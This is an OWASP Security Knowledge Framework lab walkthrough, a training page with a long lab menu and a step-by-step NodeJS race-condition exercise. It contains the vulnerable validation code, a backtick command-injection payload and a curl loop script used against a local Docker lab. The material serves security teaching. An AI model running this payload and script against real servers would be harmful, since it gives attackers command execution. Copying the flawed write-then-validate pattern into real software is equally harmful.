Security Knowledge Framework
  • Introduction
  • Auth Bypass
    • Python - Auth Bypass
    • NodeJS - Auth Bypass
  • Auth Bypass - 1
    • Python - Auth Bypass - 1
    • NodeJS - Auth Bypass - 1
    • Java - Auth Bypass - 1
  • Auth Bypass - 2
    • Python - Auth Bypass - 2
    • NodeJS - Auth Bypass - 2
    • Java - Auth Bypass - 2
  • Auth-bypass - 3
    • Python - Auth-bypass - 3
    • NodeJS - Auth-bypass - 3
    • Java - Auth-bypass - 3
  • Auth-bypass - Simple
    • Python - Auth-bypass - Simple
    • NodeJS - Auth-bypass - Simple
    • Java - Auth-bypass - Simple
  • Client Side Restriction Bypass
    • Python - Client Side Restriction Bypass
    • NodeJS - Client Side Restriction Bypass
    • Java - Client Side Restriction Bypass
  • Client Side Restriction Bypass - Harder
    • Python - Client Side Restriction Bypass - Harder
    • NodeJS - Client Side Restriction Bypass - Harder
    • Java - Client Side Restriction Bypass - Harder
  • Client Side Template Injection (CSTI)
    • Python - Client Side Template Injection (CSTI)
    • NodeJS - Client Side Template Injection (CSTI)
    • Java - Client Side Template Injection (CSTI)
  • Command Injection (CMD)
    • Python - Command Injection (CMD)
    • NodeJS - Command Injection (CMD)
    • Java - Command Injection (CMD)
  • Command Injection 2 (CMD-2)
    • Python - Command Injection 2 (CMD-2)
    • NodeJS - Command Injection 2 (CMD-2)
    • Java - Command Injection 2 (CMD-2)
  • Command Injection 3 (CMD-3)
    • Python - Command Injection 3 (CMD-3)
    • Java - Command Injection 3 (CMD-3)
  • Command Injection 4 (CMD-4)
    • Python - Command Injection 4 (CMD-4)
    • NodeJS - Command Injection 4 (CMD-4)
    • Java - Command Injection 4 (CMD-4)
  • Command Injection Blind (CMD-Blind)
    • Python - Command Injection Blind (CMD-Blind)
    • NodeJS - Command Injection Blind (CMD-Blind)
    • Java - Command Injection Blind (CMD-Blind)
  • Content-Security-Policy (CSP)
    • Python - Content-Security-Policy (CSP)
    • NodeJS - Content-Security-Policy (CSP)
    • Java - Content-Security-Policy (CSP)
  • CORS exploitation
    • Python - CORS exploitation
    • Java - CORS exploitation
  • Credentials Guessing
    • Python - Credentials Guessing
    • NodeJS - Credentials Guessing
    • Java - Credentials Guessing
  • Credentials Guessing - 2
    • Python - Credentials Guessing - 2
    • NodeJS - Credentials Guessing - 2
    • Java - Credentials Guessing - 2
  • Cross Site Scripting (XSS)
    • Python - XSS
    • NodeJS - XSS
    • Java - XSS
  • Cross Site Scripting - Attribute (XSS-Attribute)
    • Python - XSS-Attribute
    • NodeJS - XSS-Attribute
  • Cross Site Scripting - href (XSS-href)
    • Python - XSS-href
    • NodeJS - XSS-href
    • Java - XSS-href
  • Cross Site Scripting - DOM (XSS-DOM)
    • Python - XSS-DOM
    • NodeJS - XSS-DOM
    • Java - XSS-DOM
  • Cross Site Scripting - DOM-2 (XSS-DOM-2)
    • Python - XSS-DOM-2
    • NodeJS - XSS-DOM-2
    • Java - XSS-DOM-2
  • Cross Site Scripting - Stored (XSS-Stored)
    • Java - XSS-Stored
  • CSRF
    • Python - CSRF
    • NodeJS - CSRF
    • Java - CSRF
  • CSRF - Samesite
    • Python - CSRF-SameSite
    • NodeJS - CSRF-SameSite
    • Java - CSRF-SameSite
  • CSRF - Weak
    • Python - CSRF-Weak
    • NodeJS - CSRF-Weak
    • Java - CSRF-Weak
  • CSS Injection (CSSI)
    • Python - CSS Injection (CSSI)
    • NodeJS - CSS Injection (CSSI)
    • Java - CSS Injection (CSSI)
  • Deserialisation Java (DES-Java)
    • Java - Deserialisation Java (DES-Java)
  • Deserialisation Yaml (DES-Yaml)
    • Python - Deserialisation Yaml (DES-Yaml)
  • Deserialisation Pickle (DES-Pickle)
    • Python - Deserialisation Pickle (DES-Pickle)
  • Deserialisation Pickle 2 (DES-Pickle-2)
    • Python - Deserialisation Pickle 2 (DES-Pickle-2)
  • DoS Regex
    • Python - DoS Regex
    • NodeJS - DoS Regex
    • Java - DoS Regex
  • File upload
    • Python - File-Upload
    • NodeJS - File-Upload
    • Java - File-Upload
  • Formula Injection
    • Python - Formula Injection
    • NodeJS - Formula Injection
    • Java - Formula Injection
  • GraphQL DOS
    • Python - GraphQL DOS
  • GraphQL IDOR
    • Python - GraphQL IDOR
    • NodeJS - GraphQL IDOR
    • Java - GraphQL IDOR
  • GraphQL Injections
    • Python - GraphQL Injections
    • NodeJS - GraphQL Injections
    • Java - GraphQL Injections
  • GraphQL Introspection
    • Python - GraphQL Introspection
    • NodeJS - GraphQL Introspection
    • Java - GraphQL Introspection
  • GraphQL Mutations
    • Python - GraphQL Mutations
    • NodeJS - GraphQL Mutations
    • Java - GraphQL Mutations
  • Host Header Injection (Authentication Bypass)
    • Python - HttpOnly Session Hijacking XSS
  • HttpOnly Session Hijacking XSS
    • Python - HttpOnly Session Hijacking XSS
    • NodeJS - HttpOnly Session Hijacking XSS
    • Java - HttpOnly Session Hijacking XSS
  • Information Leakeage in Comments
    • Python - Information Leakeage in Comments
    • NodeJS - Information Leakeage in Comments
    • Java - Information Leakeage in Comments
  • Information Leakeage in Metadata
    • Python - Information Leakeage in Metadata
    • NodeJS - Information Leakeage in Metadata
    • Java - Information Leakeage in Metadata
  • Insecure Direct Object References (IDOR)
    • Python - Insecure Direct Object References (IDOR)
    • NodeJS - Insecure Direct Object References (IDOR)
    • Java - Insecure Direct Object References (IDOR)
  • JWT Null
    • Python - JWT Null
    • NodeJS - JWT Null
    • Java - JWT Null
  • JWT Secret
    • Python - JWT Secret
    • NodeJS - JWT Secret
    • Java - JWT Secret
  • Ldap Injection
    • Python - Ldap Injection
    • NodeJS - Ldap Injection
    • Java - Ldap Injection
  • Ldap Injection - harder
    • Python - Ldap Injection - harder
    • NodeJS - Ldap Injection - harder
    • Java - Ldap Injection - harder
  • Local File Inclusion 1 (LFI-1)
    • Python - Local File Inclusion 1 (LFI-1)
    • NodeJS - Local File Inclusion 1 (LFI-1)
    • Java - Local File Inclusion 1 (LFI-1)
  • Local File Inclusion 2 (LFI-2)
    • Python - Local File Inclusion 2 (LFI-2)
    • NodeJS - Local File Inclusion 2 (LFI-2)
    • Java - Local File Inclusion 2 (LFI-2)
  • Local File Inclusion 3 (LFI-3)
    • Python - Local File Inclusion 3 (LFI-3)
    • NodeJS - Local File Inclusion 3 (LFI-3)
    • Java - Local File Inclusion 3 (LFI-3)
  • Parameter Binding
    • Ruby - Parameter Binding
    • NodeJS - Parameter Binding
    • Java - Parameter Binding
  • Prototype Pollution
    • NodeJS - Prototype Pollution
  • Race Condition
    • Python - Race Condition
    • NodeJS - Race Condition
    • Java - Race Condition
  • Race Condition File-Write
    • Python - Race Condition File-Write
    • NodeJS - Race Condition File-Write
    • Java - Race Condition File-Write
  • Ratelimiting (Brute-force login)
    • Python - Ratelimiting
    • NodeJS - Ratelimiting
    • Java - Ratelimiting
  • Remote File Inclusion (RFI)
    • Python - Remote File Inclusion (RFI)
    • NodeJS - Remote File Inclusion (RFI)
    • Java - Remote File Inclusion (RFI)
  • Right To Left Override (RTLO)
    • Python - Right To Left Override (RTLO)
    • NodeJS - Right To Left Override (RTLO)
    • Java - Right To Left Override (RTLO)
  • Server Side Request Forgery (SSRF)
    • Python - Server Side Request Forgery (SSRF)
    • NodeJS - Server Side Request Forgery (SSRF)
  • Server Side Template Injection (SSTI)
    • Python - Server Side Template Injection (SSTI)
    • Java - Server Side Template Injection (SSTI)
  • Session Hijacking XSS
  • Session Puzzling
    • Python - Session Puzzling
    • NodeJS - Session Puzzling
    • Java - Session Puzzling
  • Session Management 1
    • Python - Session Management 1
  • SQLI (Union)
    • Python - SQLI (Union)
    • NodeJS - SQLI (Union)
    • Java - SQLI (Union)
  • SQLI Login Bypass
    • Python - Login Bypass
  • SQLI (Like)
    • Python - SQLI (Like)
    • NodeJS - SQLI (Like)
    • Java - SQLI (Like)
  • SQLI (Blind)
    • Python - SQLI (Blind)
    • NodeJS - SQLI (Blind)
    • Java - SQLI (Blind)
  • TLS Downgrade
    • Python - TLS Downgrade
  • Untrusted Sources (XSSI)
    • Python - Untrusted Sources (XSSI)
    • NodeJS - Untrusted Sources (XSSI)
    • Java - Untrusted Sources (XSSI)
  • URL Redirection
    • Python - URL Redirection
    • NodeJS - URL Redirection
    • Java - URL Redirection
  • URL Redirection - Harder
    • Python - URL Redirection - Harder
    • NodeJS - URL Redirection - Harder
    • Java - URL Redirection - Harder
  • URL Redirection - Harder-2
    • Python - URL Redirection - Harder-2
    • NodeJS - URL Redirection - Harder-2
    • Java - URL Redirection - Harder-2
  • WebSocket Message Manipulation
    • Python - WebSocket Message Manipulation
  • XML External Entity (XXE)
    • Python - XXE
    • NodeJS - XXE
    • Java - XXE
  • Exposed docker daemon
    • Python - Exposed docker daemon
  • Insecure Random
    • Python - Insecure Random
  • template item
Powered by GitBook
On this page
  • Running the app on Docker
  • Reconnaissance
  • Exploitation
  • Additional sources

Was this helpful?

Edit on GitHub
Export as PDF
  1. Race Condition

NodeJS - Race Condition

PreviousPython - Race ConditionNextJava - Race Condition

Last updated 2 years ago

Was this helpful?

Running the app on Docker

$ sudo docker pull blabla1337/owasp-skf-lab:js-racecondition
$ sudo docker run -ti -p 127.0.0.1:5000:5000 blabla1337/owasp-skf-lab:js-racecondition

Now that the app is running let's go hacking!

Reconnaissance

Step1

Congratulations, you won the race

All you need to do now is to add your name to the board and get your price.

The application shows an input box, where you can insert your username and go to the next screen, clicking "Make it mine".

The application verifies whether the username contains special characaters such as " and \ and erases them. It also applies strict filtering on the text using the following regex:

[A-Za-z0-9 ]*

If the username is correct, clicking Boot will put us on the score board. Yeah!!

Step 2

This application suffers from a race condition vulnerability, but how can we identify it?

If we look at the code we see that there are 4 functions being used:

  1. boot_validate(person)

    the function receives the username in input and executes the following:

    • deletes " and \ from the username

    • opens hello.sh file

    • writes a command in it

    • closes the file

    • logs some useful info

    • checks if the username is in the format [A-Za-z0-9 ]*

    • returns the username if the regex succedes

  2. boot_clean() that removes all the hello files (hello.sh and hello.txt)

  3. boot_run() executes the hello.sh file

  4. boot_reset() resets the system to the default settings

Step 3

If we intercept the traffic generate by the app we see that:

  • a GET request is issued to validate the username and call boot_validate(person)

GET /?person=test&action=validate

  • clicking boot, will generate the request to execute the boot_run() function

GET /?action=run HTTP/1.1

The logic behind the application is in the function start(). If the action is not validate or reset, the application runs boot_run() executing the hello.sh file.

We also notice that the function boot_validate(person) first inserts the command in the hello.sh and then validates the input, returning if it is valid or not.

const boot_validate = (person) => {
  fs.writeFileSync("hello.sh", 'echo "' + person + '" > hello.txt');
  exec("echo 'hello.sh updated -- " + Date.now() + "' > log.txt");
  exec("echo 'hello.sh cleaned -- " + Date.now() + "' >> log.txt");
  const valid = () => {
    return execSync(
      "sed -n '/^echo \"[A-Za-z0-9 ]*\" > hello.txt$/p' hello.sh"
    ).toString();
  };
  return valid();
};

Everything works fine, so where is the problem?

The problem is that in this case, we have a very small window to execute the boot_run() function after the input is written in hello.sh and just before return valid is called. Again, there is a possibility to have a race condition only if the following steps are executed in this order:

  1. pass our malicious payload to boot_validate

  2. write the malicious payload in hello.sh

  3. call boot_run()

  4. return valid is called

Exploitation

Before we can exploit the race condition, we need a good payload that will execute the command for us. We know that the double quotes and the backslash cannot be used to break the command, but we also know that using '`' backtick.

So our payload will be:

`id`

in order to execute the command id on the target system.

Now we can exploit this sequence to achieve a command injection. In order to do that we must send requests with high frequency.

Doing it manually is practically impossible, so we create a script that does that for us:

#!/bin/bash
while true; do

	curl -i -s -k  -X $'GET' \
	    -H $'Host: localhost:5000' -H $'User-Agent: Semen Rozhkov exploiter v1.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate ' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
	    $'http://localhost:5000/?action=run' | grep "Check this out"
done

and in the meantime we send the other request from the browser like

http://localhost:5000/?person=Default+User`id`&action=validate

If we look in the logs we will see:

Congratulations, you won the race for real now!!!!!!!!

Additional sources

https://wiki.owasp.org/index.php/Testing_for_Race_Conditions_(OWASP-AT-010)wiki.owasp.org